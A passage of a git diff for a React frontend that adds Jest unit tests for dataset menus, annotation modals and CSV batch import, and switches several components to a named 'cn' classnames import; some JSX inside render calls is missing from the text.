+ describe('Rendering', () => { + it('should show edit, export, and delete options when rag pipeline and deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'rag_pipeline' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.getByText('datasetPipeline.operations.exportPipeline')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + + it('should hide export and delete options when not rag pipeline and not deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'general' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.queryByText('datasetPipeline.operations.exportPipeline')).not.toBeInTheDocument() + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) +}) + +describe('Dropdown', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset({ pipeline_id: 'pipeline-1', runtime_mode: 'rag_pipeline' }) + mockIsDatasetOperator = false + mockExportPipeline.mockResolvedValue({ data: 'pipeline-content' }) + mockCheckIsUsedInApp.mockResolvedValue({ is_using: false }) + mockDeleteDataset.mockResolvedValue({}) + if (!('createObjectURL' in URL)) { + Object.defineProperty(URL, 'createObjectURL', { + value: jest.fn(), + writable: true, + }) + } + if (!('revokeObjectURL' in URL)) { + Object.defineProperty(URL, 'revokeObjectURL', { + value: jest.fn(), + writable: true, + }) + } + }) + + // Rendering behavior based on workspace role. + describe('Rendering', () => { + it('should hide delete option when user is dataset operator', async () => { + const user = userEvent.setup() + // Arrange + mockIsDatasetOperator = true + render() + + // Act + await openMenu(user) + + // Assert + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) + + // User interactions that trigger modals and exports. 
+ describe('Interactions', () => { + it('should open rename modal when edit is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByTestId('rename-modal')).toBeInTheDocument() + }) + + it('should export pipeline when export is clicked', async () => { + const user = userEvent.setup() + const anchorClickSpy = jest.spyOn(HTMLAnchorElement.prototype, 'click') + const createObjectURLSpy = jest.spyOn(URL, 'createObjectURL') + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('datasetPipeline.operations.exportPipeline')) + + // Assert + await waitFor(() => { + expect(mockExportPipeline).toHaveBeenCalledWith({ + pipelineId: 'pipeline-1', + include: false, + }) + }) + expect(createObjectURLSpy).toHaveBeenCalledTimes(1) + expect(anchorClickSpy).toHaveBeenCalledTimes(1) + }) + + it('should show delete confirmation when delete is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + + // Assert + await waitFor(() => { + expect(screen.getByText('dataset.deleteDatasetConfirmContent')).toBeInTheDocument() + }) + }) + + it('should delete dataset and redirect when confirm is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + await user.click(await screen.findByRole('button', { name: 'common.operation.confirm' })) + + // Assert + await waitFor(() => { + expect(mockDeleteDataset).toHaveBeenCalledWith('dataset-1') + }) + expect(mockInvalidDatasetList).toHaveBeenCalledTimes(1) + expect(mockReplace).toHaveBeenCalledWith('/datasets') + }) + }) +}) diff --git a/web/app/components/app-sidebar/dataset-info/index.tsx b/web/app/components/app-sidebar/dataset-info/index.tsx index 44b0baa72b..bace656d54 100644 --- a/web/app/components/app-sidebar/dataset-info/index.tsx +++ b/web/app/components/app-sidebar/dataset-info/index.tsx @@ -8,7 +8,7 @@ import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import type { DataSet } from '@/models/datasets' import { DOC_FORM_TEXT } from '@/models/datasets' import { useKnowledge } from '@/hooks/use-knowledge' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Dropdown from './dropdown' type DatasetInfoProps = { diff --git a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx index ac07333712..cf380d00d2 100644 --- a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx @@ -11,7 +11,7 @@ import AppIcon from '../base/app-icon' import Divider from '../base/divider' import NavLink from './navLink' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import Effect from '../base/effect' import Dropdown from './dataset-info/dropdown' diff --git a/web/app/components/app-sidebar/index.tsx b/web/app/components/app-sidebar/index.tsx index 86de2e2034..fe52c4cfa2 100644 --- a/web/app/components/app-sidebar/index.tsx +++ b/web/app/components/app-sidebar/index.tsx @@ -9,7 +9,7 @@ import AppSidebarDropdown 
from './app-sidebar-dropdown' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import { useStore as useAppStore } from '@/app/components/app/store' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '../base/divider' import { useHover, useKeyPress } from 'ahooks' import ToggleButton from './toggle-button' diff --git a/web/app/components/app-sidebar/navLink.tsx b/web/app/components/app-sidebar/navLink.tsx index ad90b91250..f6d8e57682 100644 --- a/web/app/components/app-sidebar/navLink.tsx +++ b/web/app/components/app-sidebar/navLink.tsx @@ -2,7 +2,7 @@ import React from 'react' import { useSelectedLayoutSegment } from 'next/navigation' import Link from 'next/link' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { RemixiconComponentType } from '@remixicon/react' export type NavIcon = React.ComponentType< @@ -42,7 +42,7 @@ const NavLink = ({ const NavIcon = isActive ? iconMap.selected : iconMap.normal const renderIcon = () => ( -
+
) @@ -53,21 +53,17 @@ const NavLink = ({ key={name} type='button' disabled - className={classNames( - 'system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', - 'pl-3 pr-1', - )} + className={cn('system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', + 'pl-3 pr-1')} title={mode === 'collapse' ? name : ''} aria-disabled > {renderIcon()} {name} @@ -79,22 +75,18 @@ const NavLink = ({ {renderIcon()} {name} diff --git a/web/app/components/app-sidebar/toggle-button.tsx b/web/app/components/app-sidebar/toggle-button.tsx index 8de6f887f6..4f69adfc34 100644 --- a/web/app/components/app-sidebar/toggle-button.tsx +++ b/web/app/components/app-sidebar/toggle-button.tsx @@ -1,7 +1,7 @@ import React from 'react' import Button from '../base/button' import { RiArrowLeftSLine, RiArrowRightSLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Tooltip from '../base/tooltip' import { useTranslation } from 'react-i18next' import { getKeyboardKeyNameBySystem } from '../workflow/utils' diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..f226adf22b --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,47 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => 
mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
<div data-testid="annotation-full" />
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { 
name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({
- <Checkbox checked={isCreateNext} onCheck={() => setIsCreateNext(!isCreateNext)} /> + <Checkbox id='create-next-checkbox' checked={isCreateNext} onCheck={() => setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
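Note on the toast assertions in the spec above: `mockToastNotify` has to carry the `mock` name prefix so Jest's hoisted `jest.mock()` factory is allowed to close over it. A minimal sketch of the wiring these specs assume (the factory shape is inferred from the calls shown above, not copied from the repo):

```typescript
// Hoisting-safe toast mock: jest.mock() factories are hoisted above the
// imports, and Jest only permits references to variables whose names
// start with "mock".
const mockToastNotify = jest.fn()

jest.mock('@/app/components/base/toast', () => ({
  __esModule: true,
  default: {
    notify: (args: { type: string; message: string }) => mockToastNotify(args),
  },
}))
```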
diff --git a/web/app/components/app/annotation/batch-action.spec.tsx b/web/app/components/app/annotation/batch-action.spec.tsx new file mode 100644 index 0000000000..36440fc044 --- /dev/null +++ b/web/app/components/app/annotation/batch-action.spec.tsx @@ -0,0 +1,42 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchAction from './batch-action' + +describe('BatchAction', () => { + const baseProps = { + selectedIds: ['1', '2', '3'], + onBatchDelete: jest.fn(), + onCancel: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should show the selected count and trigger cancel action', () => { + render() + + expect(screen.getByText('3')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + expect(baseProps.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should confirm before running batch delete', async () => { + const onBatchDelete = jest.fn().mockResolvedValue(undefined) + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.delete' })) + await screen.findByText('appAnnotation.list.delete.title') + + await act(async () => { + fireEvent.click(screen.getAllByRole('button', { name: 'common.operation.delete' })[1]) + }) + + await waitFor(() => { + expect(onBatchDelete).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-action.tsx b/web/app/components/app/annotation/batch-action.tsx index 6e80d0c4c8..6ff392d17e 100644 --- a/web/app/components/app/annotation/batch-action.tsx +++ b/web/app/components/app/annotation/batch-action.tsx @@ -3,7 +3,7 @@ import { RiDeleteBinLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { useBoolean } from 'ahooks' import Divider from '@/app/components/base/divider' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Confirm from '@/app/components/base/confirm' const i18nPrefix = 'appAnnotation.batchAction' @@ -38,7 +38,7 @@ const BatchAction: FC = ({ setIsNotDeleting() } return ( -
+
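The batch-action spec above reaches the confirm dialog's delete button with `getAllByRole(...)[1]`. Index-based queries are brittle when two buttons share an accessible name; scoping the query with `within` is a sturdier alternative. A minimal sketch to use inside an async test (the `[role="dialog"]` container lookup is an assumption about what `Confirm` renders, not a verified detail):

```typescript
import { screen, within } from '@testing-library/react'

// Scope the query to the confirm dialog instead of indexing into
// getAllByRole, so the assertion cannot hit the toolbar's delete button.
const title = await screen.findByText('appAnnotation.list.delete.title')
const dialog = title.closest('[role="dialog"]') as HTMLElement
const confirmDelete = within(dialog).getByRole('button', { name: 'common.operation.delete' })
```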
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx new file mode 100644 index 0000000000..7d360cfc1b --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx @@ -0,0 +1,72 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import CSVDownload from './csv-downloader' +import I18nContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { Locale } from '@/i18n-config' + +const downloaderProps: any[] = [] + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: jest.fn(() => ({ + CSVDownloader: ({ children, ...props }: any) => { + downloaderProps.push(props) + return
{children}
+ }, + Type: { Link: 'link' }, + })), +})) + +const renderWithLocale = (locale: Locale) => { + return render( + + + , + ) +} + +describe('CSVDownload', () => { + const englishTemplate = [ + ['question', 'answer'], + ['question1', 'answer1'], + ['question2', 'answer2'], + ] + const chineseTemplate = [ + ['问题', '答案'], + ['问题 1', '答案 1'], + ['问题 2', '答案 2'], + ] + + beforeEach(() => { + downloaderProps.length = 0 + }) + + it('should render the structure preview and pass English template data by default', () => { + renderWithLocale('en-US' as Locale) + + expect(screen.getByText('share.generation.csvStructureTitle')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchModal.template')).toBeInTheDocument() + + expect(downloaderProps[0]).toMatchObject({ + filename: 'template-en-US', + type: 'link', + bom: true, + data: englishTemplate, + }) + }) + + it('should switch to the Chinese template when locale matches the secondary language', () => { + const locale = LanguagesSupported[1] as Locale + renderWithLocale(locale) + + expect(downloaderProps[0]).toMatchObject({ + filename: `template-${locale}`, + data: chineseTemplate, + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx new file mode 100644 index 0000000000..d94295c31c --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx @@ -0,0 +1,115 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CSVUploader, { type Props } from './csv-uploader' +import { ToastContext } from '@/app/components/base/toast' + +describe('CSVUploader', () => { + const notify = jest.fn() + const updateFile = jest.fn() + + const getDropElements = () => { + const title = screen.getByText('appAnnotation.batchModal.csvUploadTitle') + const dropZone = title.parentElement?.parentElement as HTMLDivElement | null + if (!dropZone || !dropZone.parentElement) + throw new Error('Drop zone not found') + const dropContainer = dropZone.parentElement as HTMLDivElement + return { dropZone, dropContainer } + } + + const renderComponent = (props?: Partial) => { + const mergedProps: Props = { + file: undefined, + updateFile, + ...props, + } + return render( + + + , + ) + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should open the file picker when clicking browse', () => { + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.batchModal.browse')) + + expect(clickSpy).toHaveBeenCalledTimes(1) + clickSpy.mockRestore() + }) + + it('should toggle dragging styles and upload the dropped file', async () => { + const file = new File(['content'], 'input.csv', { type: 'text/csv' }) + renderComponent() + const { dropZone, dropContainer } = getDropElements() + + fireEvent.dragEnter(dropContainer) + expect(dropZone.className).toContain('border-components-dropzone-border-accent') + expect(dropZone.className).toContain('bg-components-dropzone-bg-accent') + + fireEvent.drop(dropContainer, { dataTransfer: { files: [file] } }) + + await waitFor(() => expect(updateFile).toHaveBeenCalledWith(file)) + expect(dropZone.className).not.toContain('border-components-dropzone-border-accent') + }) + + it('should ignore drop events without dataTransfer', () => { + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer) + 
+ expect(updateFile).not.toHaveBeenCalled() + }) + + it('should show an error when multiple files are dropped', async () => { + const fileA = new File(['a'], 'a.csv', { type: 'text/csv' }) + const fileB = new File(['b'], 'b.csv', { type: 'text/csv' }) + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer, { dataTransfer: { files: [fileA, fileB] } }) + + await waitFor(() => expect(notify).toHaveBeenCalledWith({ + type: 'error', + message: 'datasetCreation.stepOne.uploader.validation.count', + })) + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should propagate file selection changes through input change event', () => { + const file = new File(['row'], 'selected.csv', { type: 'text/csv' }) + const { container } = renderComponent() + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + fireEvent.change(fileInput, { target: { files: [file] } }) + + expect(updateFile).toHaveBeenCalledWith(file) + }) + + it('should render selected file details and allow change/removal', () => { + const file = new File(['data'], 'report.csv', { type: 'text/csv' }) + const { container } = renderComponent({ file }) + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + expect(screen.getByText('report')).toBeInTheDocument() + expect(screen.getByText('.csv')).toBeInTheDocument() + + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + fireEvent.click(screen.getByText('datasetCreation.stepOne.uploader.change')) + expect(clickSpy).toHaveBeenCalled() + clickSpy.mockRestore() + + const valueSetter = jest.spyOn(fileInput, 'value', 'set') + const removeTrigger = screen.getByTestId('remove-file-button') + fireEvent.click(removeTrigger) + + expect(updateFile).toHaveBeenCalledWith() + expect(valueSetter).toHaveBeenCalledWith('') + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx index b98eb815f9..c9766135df 100644 --- a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx @@ -4,7 +4,7 @@ import React, { useEffect, useRef, useState } from 'react' import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { RiDeleteBinLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Csv as CSVIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import Button from '@/app/components/base/button' @@ -114,7 +114,7 @@ const CSVUploader: FC = ({
-
+
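The batch-modal spec that follows drives a `setTimeout`-based polling loop under fake timers. As a standalone sketch of that pattern (the `poll` helper and the 2500ms interval are illustrative stand-ins, not the component's actual internals):

```typescript
it('polls until the job completes (sketch)', async () => {
  jest.useFakeTimers()
  const check = jest.fn()
    .mockResolvedValueOnce({ job_status: 'processing' })
    .mockResolvedValueOnce({ job_status: 'completed' })

  // Illustrative stand-in for the component's progress loop.
  const poll = async (): Promise<void> => {
    const res = await check()
    if (res.job_status !== 'completed')
      setTimeout(poll, 2500)
  }

  await poll() // first check resolves "processing" and queues a timer
  jest.runOnlyPendingTimers() // fire the queued re-check
  await Promise.resolve() // let the second mocked resolution settle
  expect(check).toHaveBeenCalledTimes(2)
  jest.useRealTimers()
})
```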
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..5527340895 --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx @@ -0,0 +1,164 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchModal, { ProcessStatus } from './index' +import { useProviderContext } from '@/context/provider-context' +import { annotationBatchImport, checkAnnotationBatchImportProgress } from '@/service/annotation' +import type { IBatchModalProps } from './index' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(), + }, +})) + +jest.mock('@/service/annotation', () => ({ + annotationBatchImport: jest.fn(), + checkAnnotationBatchImportProgress: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./csv-downloader', () => ({ + __esModule: true, + default: () =>
, +})) + +let lastUploadedFile: File | undefined + +jest.mock('./csv-uploader', () => ({ + __esModule: true, + default: ({ file, updateFile }: { file?: File; updateFile: (file?: File) => void }) => ( +
+ <div> + <button data-testid='mock-uploader' onClick={() => { + lastUploadedFile = new File(['question,answer'], 'batch.csv', { type: 'text/csv' }) + updateFile(lastUploadedFile) + }}> + select file + </button> + {file && <span data-testid='selected-file'>{file.name}</span>} + </div>
+ ), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () => <div data-testid='annotation-full' />
, +})) + +const mockNotify = Toast.notify as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock +const annotationBatchImportMock = annotationBatchImport as jest.Mock +const checkAnnotationBatchImportProgressMock = checkAnnotationBatchImportProgress as jest.Mock + +const renderComponent = (props: Partial = {}) => { + const mergedProps: IBatchModalProps = { + appId: 'app-id', + isShow: true, + onCancel: jest.fn(), + onAdded: jest.fn(), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('BatchModal', () => { + beforeEach(() => { + jest.clearAllMocks() + lastUploadedFile = undefined + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should disable run action and show billing hint when annotation quota is full', () => { + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 10 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }) + + renderComponent() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'appAnnotation.batchModal.run' })).toBeDisabled() + }) + + it('should reset uploader state when modal closes and allow manual cancellation', () => { + const { rerender, props } = renderComponent() + + fireEvent.click(screen.getByTestId('mock-uploader')) + expect(screen.getByTestId('selected-file')).toHaveTextContent('batch.csv') + + rerender() + rerender() + + expect(screen.queryByTestId('selected-file')).toBeNull() + + fireEvent.click(screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' })) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should submit the csv file, poll status, and notify when import completes', async () => { + jest.useFakeTimers() + const { props } = renderComponent() + const fileTrigger = screen.getByTestId('mock-uploader') + fireEvent.click(fileTrigger) + + const runButton = screen.getByRole('button', { name: 'appAnnotation.batchModal.run' }) + expect(runButton).not.toBeDisabled() + + annotationBatchImportMock.mockResolvedValue({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + checkAnnotationBatchImportProgressMock + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.COMPLETED }) + + await act(async () => { + fireEvent.click(runButton) + }) + + await waitFor(() => { + expect(annotationBatchImportMock).toHaveBeenCalledTimes(1) + }) + + const formData = annotationBatchImportMock.mock.calls[0][0].body as FormData + expect(formData.get('file')).toBe(lastUploadedFile) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(1) + }) + + await act(async () => { + jest.runOnlyPendingTimers() + }) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(2) + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'success', + message: 'appAnnotation.batchModal.completed', + }) + expect(props.onAdded).toHaveBeenCalledTimes(1) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + jest.useRealTimers() + }) +}) diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ 
b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..95a5586292 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,466 @@ +import { render, 